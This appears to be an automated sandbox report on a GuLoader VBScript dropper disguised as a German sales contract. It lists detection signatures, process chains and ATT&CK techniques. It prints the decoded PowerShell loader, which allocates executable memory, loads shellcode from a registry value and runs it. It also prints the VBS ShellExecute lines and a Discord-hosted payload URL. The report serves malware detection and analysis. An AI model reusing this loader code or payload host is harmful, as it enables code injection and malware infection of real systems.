
Windows Analysis Report
tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs

Overview

General Information

Sample Name: tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
Analysis ID: 560422
MD5: b8fbb413a49b2f05872cb38372454664
SHA1: 2071d3476c94b3cfc924b31c705806e78df674a8
SHA256: cffa320db9834e3f224aa5961073fc9d0cb14f34c6430ffa2d7468da7da7ce32

Detection

GuLoader
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 4676 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 7148 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"Payload URL": "https://cdn.discordapp.com/attachments/933089228261294143/9"}
Source: 00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security

    System Summary

    Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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
    Source: Process started | Author: frack113 | Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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
    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7148, TargetFilename: C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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
    Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132877116867900207.7148.DefaultAppDomain.powershell


    AV Detection

    Source: 00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://cdn.discordapp.com/attachments/933089228261294143/9"}

    Networking

    Source: Malware configuration extractor | URLs: https://cdn.discordapp.com/attachments/933089228261294143/9
    Source: powershell.exe, 00000005.00000002.887747537.0000000008140000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000005.00000002.876857673.0000000005361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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
    Source: Initial file | Intercompa.ShellExecute Numb5, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
    Source: Initial file | Intercompa.ShellExecute Klagenspar, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
    Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 3956
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_03272019
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_03271938
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0327CE38
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_03272708
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_082CBB68
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_082CEBB0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_082C7290
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_082C5A30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_082C5A40
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 98%
    Source: tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs | Initial sample: Strings found which are bigger than 50
    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP"
    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220126
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz54gho0.0ha.ps1
    Source: classification engine | Classification label: mal84.troj.evad.winVBS@8/10@0/0
    Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_01
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

    Data Obfuscation

    Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", "-NoExit -EncodedCommand "IwBlAHIAaAB2AG", "", "", "0")
    Source: Yara match | File source: 00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0327A067 push esp; retf 5_2_0327A079
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0327C489 push esp; retf 5_2_0327C495
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0327FC62 push edi; retf 5_2_0327FC66
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dll
    Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4692 | Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6194
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2196
    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\wscript.exe | Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 321 Scripting | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 21 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 321 Scripting | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Behavior Graph ID: 560422 | Sample: tregrene-KaufVertraeg-Joach... | Startdate: 26/01/2022 | Architecture: WINDOWS | Score: 84
Sample signatures: Found malware configuration; Yara detected GuLoader; Potential malicious VBS script found (suspicious strings); C2 URLs / IPs found in malware configuration
wscript.exe (started by the sample)
  signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found
  -> powershell.exe (started)
       -> csc.exe (started); dropped: C:\Users\user\AppData\Local\...\ejetful0.dll, PE32
            -> cvtres.exe (started)
       -> conhost.exe (started)

Source | Detection | Scanner | Label
tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs | 0% | Virustotal |
    No Antivirus matches
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
https://cdn.discordapp.com/attachments/933089228261294143/9 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.876857673.0000000005361000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                No contacted IP infos
                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:560422
                Start date:26.01.2022
                Start time:15:00:13
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 46s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:23
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal84.troj.evad.winVBS@8/10@0/0
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 68
                • Number of non-executed functions: 5
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .vbs
                • Override analysis time to 240s for JS files taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
15:02:04 | API Interceptor | 63x Sleep call for process: powershell.exe modified
                No context
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8003
                Entropy (8bit):4.839308921501875
                Encrypted:false
                SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                MD5:937C6E940577634844311E349BD4614D
                SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
                Category:dropped
                Size (bytes):1340
                Entropy (8bit):3.9844957008769284
                Encrypted:false
                SSDEEP:24:H+DK9oVapOwgcKXNcaH2hKcjmfwI+ycuZhNW6akSJLPNnq9ed:ejIpOVcU3MK2mo1ulW6a3Jhq9+
                MD5:FC49CB16555CCB3E9712B61780093A4F
                SHA1:2CCC9817ACFB52EEA331713E6A51EB48A4F87E4C
                SHA-256:B16B44D6970784B72DA775D83FB9F2FD04B42C9FD8F09741F78CD2E54EA9E064
